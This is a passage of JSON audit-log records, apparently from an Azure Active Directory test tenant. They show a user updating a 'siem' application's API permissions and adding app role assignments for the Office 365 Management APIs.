"2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"NewValue": "RequiredResourceAccess", "OldValue": "", "Name": "Included Updated Properties"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      },\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "OldValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  },\r\n  {\r\n    \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n        \"DirectAccessGrant\": true,\r\n        \"ImpersonationAccessGrants\": []\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]", "Name": "RequiredResourceAccess"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7174137Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793182"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "d6ad8dba-dd88-499e-a1e1-e649bf8eeb71"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:25:54", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "51e48c97-80b1-42bb-b732-8b578dfac528"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:25:54.7823970Z"}, {"Name": "env_epoch", "Value": "73AB6"}, {"Name": "env_seqNum", "Value": "43793206"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR575"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "606ae654-e71e-4a6b-a07c-85acd775667b"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
